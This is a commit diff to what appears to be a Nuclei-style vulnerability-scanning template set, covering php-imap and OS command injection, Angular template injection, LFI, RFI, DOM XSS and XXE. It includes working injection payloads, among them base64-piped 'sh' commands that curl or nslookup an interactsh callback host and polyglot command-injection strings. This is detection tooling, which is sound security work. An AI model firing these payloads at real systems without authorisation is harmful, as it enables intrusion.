few misc updates

patch-1
Prince Chaddha 2024-04-08 12:15:08 +05:30
parent 421f9dfd9f
commit beff2af7c1
9 changed files with 35 additions and 20 deletions

View File

@ -28,15 +28,21 @@ http:
payloads:
php-imap:
- "x -oProxyCommand=echo {{base64(url_encode('nslookup {{interactsh-url}}'))}}|base64 -d|sh}"
- "x -oProxyCommand=echo {{base64(url_encode('curl {{interactsh-url}}'))}}|base64 -d|sh}"
fuzzing:
- part: query
fuzz:
- "{{php-imap}}"
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
part: interactsh_protocol
words:
- "dns"
- http
- type: word
part: interactsh_request
words:
- "User-Agent: curl"

View File

@ -64,3 +64,4 @@ http:
part: interactsh_request
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output

View File

@ -22,7 +22,7 @@ http:
- 'method == "GET"'
payloads:
interaction:
payload:
- "&nslookup {{marker}}&'\\\"`0&nslookup {{marker}}&`'"
- "1;nslookup${IFS}{{marker}};#${IFS}';nslookup${IFS}{{marker}};#${IFS}\";nslookup${IFS}{{marker}};#${IFS}"
- "/*$(nslookup {{marker}})`nslookup {{marker}}``*/-nslookup({{marker}})-'/*$(nslookup {{marker}})`nslookup {{marker}}` #*/-nslookup({{marker}})||'\"||nslookup({{marker}})||\"/*`*/"
@ -32,7 +32,7 @@ http:
- part: query
type: postfix
fuzz:
- "{{interaction}}"
- "{{payload}}"
stop-at-first-match: true
matchers:

View File

@ -11,6 +11,7 @@ http:
- type: dsl
dsl:
- 'method == "GET"'
payloads:
escape:
- "%00"

View File

@ -4,10 +4,16 @@ info:
name: Angular Client-side-template-injection
author: theamanrawat
severity: high
description: |
Detects Angular client-side template injection vulnerability.
impact: |
May lead to remote code execution or sensitive data exposure.
remediation: |
Sanitize user inputs and avoid using user-controlled data in template rendering.
reference:
- https://www.acunetix.com/vulnerabilities/web/angularjs-client-side-template-injection/
- https://portswigger.net/research/xss-without-html-client-side-template-injection-with-angularjs
tags: angular,csti,dast
tags: angular,csti,dast,headless,xss
variables:
first: "{{rand_int(1000, 9999)}}"
@ -19,6 +25,7 @@ headless:
- action: navigate
args:
url: "{{BaseURL}}"
- action: waitload
payloads:

View File

@ -1,7 +1,7 @@
id: lfi-keyed
info:
name: Key LFI Detection
name: LFI Detection - Keyed
author: pwnhxl
severity: unknown
reference:

View File

@ -1,7 +1,7 @@
id: rfi
id: generic-rfi
info:
name: Remote File Inclusion
name: Generic Remote File Inclusion
author: m4lwhere
severity: high
reference:

View File

@ -4,18 +4,22 @@ info:
name: DOM Cross Site Scripting
author: theamanrawat
severity: medium
tags: xss,dom,dast
description: |
Detects DOM-based Cross Site Scripting (XSS) vulnerabilities.
impact: |
Allows attackers to execute malicious scripts in the victim's browser.
remediation: |
Sanitize and validate user input to prevent script injection.
tags: xss,dom,dast,headless
variables:
num: "{{rand_int(10000, 99999)}}"
headless:
- steps:
- action: navigate
args:
url: "{{BaseURL}}"
- action: waitload
- action: waitload
payloads:
reflection:
- "'\"><h1>{{num}}</h1>"
@ -38,8 +42,4 @@ headless:
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
- "text/html"

View File

@ -1,7 +1,7 @@
id: fuzz-xxe
id: generic-xxe
info:
name: XXE Fuzzing
name: Generic XML external entity (XXE)
author: pwnhxl
severity: medium
reference: